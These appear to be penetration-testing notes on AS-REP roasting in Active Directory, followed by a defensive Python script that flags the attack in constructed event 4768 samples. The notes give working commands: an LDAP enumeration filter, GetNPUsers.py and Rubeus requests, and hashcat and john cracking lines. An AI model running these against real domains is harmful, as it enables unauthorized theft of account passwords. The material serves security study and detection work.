2 ASREPRoast
- targets user accounts with “Do not require Kerberos pre-authentication” enabled in AD; the flag is disabled by default.
- anyone can send an AS_REQ to the KDC on such a user’s behalf and receive an AS_REP whose encrypted part is protected with the user’s key, which is derived from the user’s password.
- crack that encrypted data (the “hash”) offline to recover the password.
- no domain account required; just network connectivity to the KDC (a DC)
- however, with a domain account, the users in the domain that don’t require Kerberos pre-auth can be enumerated via an LDAP query:
  - (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
  - first clause: return user accounts ONLY (805306368 = SAM_NORMAL_USER_ACCOUNT; no computer accounts)
  - second clause: bitwise-AND match (matching rule 1.2.840.113556.1.4.803) on userAccountControl for the DONT_REQ_PREAUTH flag (4194304 = 0x400000)
Tools: impacket’s GetNPUsers.py (Linux), Rubeus (Windows)
Linux
Note: the -format flag selects the hash format (hashcat or john) written to -outputfile; the first form needs no credentials and takes a list of candidate usernames, the second authenticates with a domain account, enumerates no-preauth users via LDAP and requests an AS_REP for each (-request)
GetNPUsers.py DOMAIN/ -usersfile USERLIST -format hashcat -outputfile FILE
GetNPUsers.py DOMAIN/USERNAME:PASSWORD -request -format hashcat -outputfile FILE
Windows
Note: the /format flag selects the hash format (hashcat or john) written to /outfile; Rubeus runs in a domain context and enumerates no-preauth users itself
.\Rubeus.exe asreproast /format:hashcat /outfile:FILE
Cracking the AS_REP / hash
hashcat
hashcat -m 18200 HASHFILE WORDLIST
john
john --wordlist=WORDLIST HASHFILE
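As an added defensive example (not part of these notes or of the impacket/Rubeus projects): a small Python check that tests the userAccountControl bit the LDAP filter above matches, and flags AS-REP roasting in Windows Security event 4768 records, where Pre-Authentication Type 0 means the TGT was issued without pre-auth and Ticket Encryption Type 0x17 is RC4, the etype behind hashcat mode 18200. The 4768 records and their key=value layout are constructed sample input, not real log output; the field names are the event’s EventData names.

```python
from collections import defaultdict

# Constructed sample records (not real logs) of Windows Security event 4768,
# flattened to key=value pairs using the event's EventData field names.
# Real IpAddress values are often IPv6-mapped ("::ffff:10.0.0.99").
SAMPLE_4768 = [
    "TargetUserName=alice IpAddress=10.0.0.5 PreAuthType=2 TicketEncryptionType=0x12",
    "TargetUserName=svc-backup IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17",
    "TargetUserName=bob IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17",
    "TargetUserName=legacy-app IpAddress=10.0.0.7 PreAuthType=0 TicketEncryptionType=0x12",
    "TargetUserName=carol IpAddress=10.0.0.5 PreAuthType=2 TicketEncryptionType=0x17",
]

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit 4194304 used in the LDAP filter above
RC4_HMAC = 0x17              # etype 23, the AS-REP encryption type hashcat mode 18200 cracks


def requires_no_preauth(uac: int) -> bool:
    """True when a userAccountControl value has DONT_REQ_PREAUTH set (what the
    LDAP filter's bitwise-AND rule 1.2.840.113556.1.4.803 matches)."""
    return bool(uac & DONT_REQ_PREAUTH)


def parse_4768(line: str) -> dict:
    """Split one flattened 4768 record into a field dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def is_roast_candidate(rec: dict) -> bool:
    """TGT issued with no pre-auth (PreAuthType 0) and RC4 encryption: the
    combination an AS-REP roasting request for mode 18200 leaves behind. One hit
    can still be a legitimate logon by a no-preauth account, so it is a lead."""
    return rec["PreAuthType"] == "0" and int(rec["TicketEncryptionType"], 16) == RC4_HMAC


def roasting_sources(lines, min_accounts: int = 2) -> dict:
    """Group candidate AS-REPs by requesting IP and return the IPs that pulled
    hashes for at least min_accounts distinct users, i.e. enumeration at scale."""
    per_ip = defaultdict(set)
    for line in lines:
        rec = parse_4768(line)
        if is_roast_candidate(rec):
            per_ip[rec["IpAddress"]].add(rec["TargetUserName"])
    return {ip: sorted(users) for ip, users in per_ip.items() if len(users) >= min_accounts}


if __name__ == "__main__":
    print(requires_no_preauth(0x400200))   # True: NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    print(roasting_sources(SAMPLE_4768))   # {'10.0.0.99': ['bob', 'svc-backup']}
```

Accounts that legitimately need the flag still show PreAuthType 0 on every logon, so the per-source count is the signal to alert on; the bit check is the input for an audit that removes the flag where it is not needed.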